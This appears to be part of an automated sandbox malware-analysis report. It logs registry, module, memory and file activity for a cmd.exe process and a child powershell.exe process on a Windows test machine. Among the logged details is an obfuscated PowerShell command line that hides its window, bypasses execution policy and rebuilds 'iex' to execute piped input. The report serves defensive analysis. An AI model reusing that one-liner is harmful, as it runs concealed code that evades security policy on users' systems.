| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:17 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 126438 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 |
Process #15: powershell.exe
381
219
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:15, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb90 |
| Parent PID | 0xb80 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B94
0x
B9C
0x
BA0
0x
BA8
0x
BC8
0x
BCC
0x
BE8
0x
704
0x
828
0x
508
0x
8DC
0x
85C
0x
884
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00045fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| powershell.exe.mui | 0x00070000 | 0x00072fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x001e0000 | 0x001e3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x001f0000 | 0x0020ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00220000 | 0x00223fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00440000 | 0x0046ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00790fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x01b9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01ca2fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x01cb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001cd0000 | 0x01cd0000 | 0x01daefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01ddffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e5ffff | Private Memory | rwx |
|
|
|
- |
| l_intl.nls | 0x01e60000 | 0x01e62fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e70fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01e80000 | 0x01e84fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01e90000 | 0x01e97fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01fa0000 | 0x02005fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002010000 | 0x02010000 | 0x02010fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x020a0000 | 0x0236efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002370000 | 0x02370000 | 0x02762fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x028effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000029f0000 | 0x029f0000 | 0x029f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000029f0000 | 0x029f0000 | 0x02a00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002a20000 | 0x02a20000 | 0x02a9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02b3ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02b40000 | 0x02b80fff | Memory Mapped File | r |
|
|
|
- |
| mscorrc.dll | 0x02b90000 | 0x02be3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c00000 | 0x02c00000 | 0x1abfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ac00000 | 0x1ac00000 | 0x1b2cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b2d0000 | 0x1b2d0000 | 0x1b3d0fff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x1b3e0000 | 0x1b49ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000001b520000 | 0x1b520000 | 0x1b59ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b5a0000 | 0x1b881fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x756a0000 | 0x75768fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f1f0000 | 0x13f266fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fee16f0000 | 0x7fee1884fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fee1890000 | 0x7fee19fbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fee1a00000 | 0x7fee20a4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fee20b0000 | 0x7fee20edfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fee20f0000 | 0x7fee2207fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fee2210000 | 0x7fee2425fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee2430000 | 0x7fee2514fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee2520000 | 0x7fee25c9fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee25d0000 | 0x7fee2638fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee2640000 | 0x7fee296dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee2970000 | 0x7fee34ccfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee34d0000 | 0x7fee3581fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee3590000 | 0x7fee3fb2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee3fc0000 | 0x7fee4e9bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee5120000 | 0x7fee5abcfff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee6780000 | 0x7fee67b1fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x7fee69e0000 | 0x7fee69e6fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee9ce0000 | 0x7fee9d78fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee9d80000 | 0x7fee9deefff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 91 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (79)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
36 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
16 | |
| Read | - | size = 4096, size_out = 3022 |
|
1 | |
| Read | - | size = 50, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 1024, size_out = 79 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 1024, size_out = 0 |
|
1 |
Registry (51)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
